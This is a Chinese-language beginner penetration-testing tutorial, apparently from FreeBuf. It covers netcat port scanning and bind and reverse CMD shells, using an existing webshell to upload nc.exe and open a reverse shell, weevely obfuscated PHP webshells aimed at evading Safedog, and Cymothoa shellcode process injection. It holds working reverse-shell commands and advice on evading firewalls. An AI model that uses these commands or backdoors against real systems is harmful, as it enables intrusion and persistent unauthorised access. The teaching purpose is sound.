NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(networkconnection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能。NetCat小巧且功能强大,可谓是居家旅行出门必备的“瑞士军刀”。 一般我们使用netcat做的最多的事情为以下三种: 1、扫描指定IP端口情况 2、端口转发数据(重点) 3、提交自定义数据包 实例演示:NC反弹CMDShell #连接到某处 netcat[-options]hostnameport[s][ports]… #监听端口等待连接 netcat-l-pport[-options][hostname][port] #Options -uUDP模式 -v显示详细信息[-vv更详细信息] -wsecs连接超时设置 -zI/O模式[扫描时使用] -l监听入站信息 -pport打开本地端口 -n以数字形式表示的IP地址 -t以TELNET的形式应答入站请求 -eprog程序重定向 【命令】netcat-vipport 【解释】扫瞄某IP的某个端口,返回端口信息详细输出。 【命令】netcat-v-zipport-port 【解释】扫描某IP的端口段,返回端口信息详细输出,但扫描速度很慢。 【命令】netcat-v-z-uipport-port 【解释】扫描某IP的某UDP端口段,返回端口信息详细输出,但扫描速度很慢。 【命令】netcat-nvv-w2-zipport-port 【解释】扫锚某IP的端口段,连接超时时间为2秒。 【命令】netcat-l-p80 【解释】开启本机的TCP80端口并监听次端口的上传输的数据。 【命令】netcat-l-v-p80 【解释】开启本机的TCP80端口并将监听到的信息输出到当前CMD窗口。 【命令】netcat-l-p80log.dat 【解释】开启本机的TCP80端口并将监听到的信息输出到log.dat日志文件里。 【命令】netcat-nvv192.168.1.180 【解释】连接到192.168.1.101主机的80端口 【远程运行】netcat-l-p1234-t-e%windir%/system32/cmd.exe 【本地运行】netcat-nvv192.168.1.11234 采用正向连接方式,远程主机(注:假设IP地址为192.168.1.1)上执行上述命令即为绑定远程主机的CMD到1234端口,当本地主机连接远程主机成功时就会返回给本地主机一个CMDShell。 【本地运行】netcat-l–vv-p1234 【远程运行】netcat-t-e%windir%/system32/cmd.exe192.168.1.21234 采用反向连接方式,先在本地主机运行nc-l–vv-p1234开启1234端口并监听等待远程主机连接;在远程主机上运行nc-t-ecmd.exe192.168.1.21234将远程主机的CMD重定向到IP地址为192.168.1.2(即本机)端口号为1234的主机上,连接成功后IP地址为192.168.1.2的主机会得到一个CMDShell。 在Web渗透中,有时候拿到了webshell,我们经常会执行很多命令进行提权等操作,但当我们要尝试很多命令的时候,使用webshell执行cmd往往没有本地执行方便,Web程序不稳定,容易崩溃。因此可以借助Webshell通过NC反弹Cmdshell。 #例如已经得到一只webshell如图 简单看了下,得知: 1、操作系统版本为WinNT6.1.7601,那么要么Win7要么WinServer2008,既然是服务器,后者可能性更大) 2、目录访问权限:除了C盘不能访问,D、E、F、H盘都能跨目录访问,说明权限还是比较大的,另外很多文件都具有r/w权限 3、通过多点Ping测试返回结果,可以认为该网站没有使用CDN加速,即能通过域名轻松得到真实IP 关于判断CDN、找出CDN下真实IP的方法,我之前整理过,有兴趣的话也许可以看下这篇文章:绕过CDN查看真实IP 通过以上信息,那么思路可以如下:步骤简单演示 1、上传cmd.exe、nc.exe到D盘根目录(上传到权限大的目录) 2、通过NC建立反弹得到CMDShell(一般选一个看起来“正常”点的端口,奇奇怪怪的端口防火墙容易拦截) 【本地】netcat-l–vv-p23 【Shell上】nc.exe-t-ecmd.exeX.X.X.X23 其中X.X.X.X为本机公网IP,实际测试需确保外网能访问本机,必要时需端口映射等。 【Shell上执行】nc.exe-t-ecmd.exeX.X.X.X23 Netcat隧道加密之Cryptcat,正所谓菜刀砍狗头,渗透信猫流,狗和猫常常是相互的,比如安全狗。cryptcat与netcat最主要区别就是,通过隧道在传输数据时,它传输的数据经过了加密。 Cryptcat是经典网络工具netcat的加密版,使用twofish算法加密,其密钥协商过程基于发送、接收双发共享的一个password。Cryptcat用法基本和NC相近,不过多介绍了。 weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php)。使用weevely生成的shell免杀能力很强,并使用加密连接,往往能轻松突破防火墙拦截。 概要:常用语法简单介绍 实例演示:一句话木马突破“安全狗” 输入weevelygenerate可查看帮助 #从提示中可以看到 连接一句话木马:weevelyURLpassword[cmd] 加载session文件weevelysessionpath[cmd] 生成后门代理weevelygeneratepasswordpath #通过weevely生成一句话木马 weevelygeneratetest/root/Desktop/test.php (#test为密码,/root/Desktop/test.php输出路径) Cymothoa是一款可以将shellcode注入到现有进程的(即插进程)后门工具。借助这种注入手段,它能够把shellcode伪装成常规程序。它所注入的后门程序应当能够与被注入的程序(进程)共存,以避免被管理和维护人员怀疑。将shellcode注入到其他进程,还有另外一项优势:即使目标系统的安全防护工具能够监视可执行程序的完整性,只要它不检测内存,那么它就不能发现(插进程)后门程序的进程。 很赞的点是注入到的进程,只要有权限就行,然后反弹的也就是进程相应的权限(并不需要root那样),当然进程重启或者挂了也就没了.当然动作也是很明显的。 实例演示:利用Cymothoa注入后门 1.首先可先查看程序PID(*nix系统ps,windows系统tasklist) 嗯,这几篇文章么,是有个事情,刚好需要这些给一些大一大二的培训,然后xx找我整理,所以就简单的整理了下,内容么偏简单,介绍些工具,基本也没什么难度,Freebuf这边比较鼓励新人,因此给了个机会发了这些文章(这里感谢Freebuf,尤其洋葱哥)文章么老早就交了,写了什么也没忘了,所以前一篇一不小心xxx我也真的是没注意到,到现在我还是一脸蒙蔽的…. 那些在下面喷我的朋友们,我能理解Y(^_^)Y被喷是好事,至少说明大家还是希望Freebuf多出好文的,以后投稿我会注意的。当然那些在下面挺我的小伙伴我也非常感谢大家Y(^_^)Y有个好消息就是这是最后一篇了,我也不会再写也懒得再写这种东西了,说真的一个月前熬夜写这个也是一脸蒙蔽—+二脸蒙球的某云现在不能愉快的玩耍了,以后就好好在FB混^–^(另外,并没有基友啊,正想找一个^^呢,求推荐,一起??哈哈) *本文原创作者:sysorem,转载须注明来自 推荐: |